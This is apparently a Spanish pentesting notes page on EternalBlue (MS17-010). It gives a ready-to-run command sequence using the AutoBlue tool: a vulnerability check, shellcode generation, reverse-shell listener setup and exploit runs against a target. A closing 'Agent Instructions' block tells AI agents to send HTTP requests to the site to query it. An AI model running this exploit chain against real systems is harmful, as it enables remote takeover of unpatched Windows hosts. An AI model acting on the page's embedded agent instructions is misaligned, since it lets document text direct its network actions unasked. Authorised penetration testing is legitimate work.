# EternalBlue (CVE-2017-0144 / MS17-010)

* <https://github.com/3ndG4me/AutoBlue-MS17-010>

```bash
# Clonación de repositorio 
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010

# Revisión si objetivo es vulnerable a EternalBlue (CVE-2017-0144 / MS17-010)
python3 eternal_checker.py <target>

# Generación de shellcode
cd shellcode && ./shell_prep.sh

# Configuración de listeners de reverse shell
cd .. && ./listener_prep.sh

# Exploit
python3 eternalblue_exploit7.py <target> ./shellcode/sc_all.bin
python3 eternalblue_exploit7.py <target> ./shellcode/sc_x64.bin
python3 eternalblue_exploit7.py <target> ./shellcode/sc_x86.bin
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentesting.mrw0l05zyn.cl/explotacion/vulnerabilidades/eternalblue-cve-2017-0144-ms17-010.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
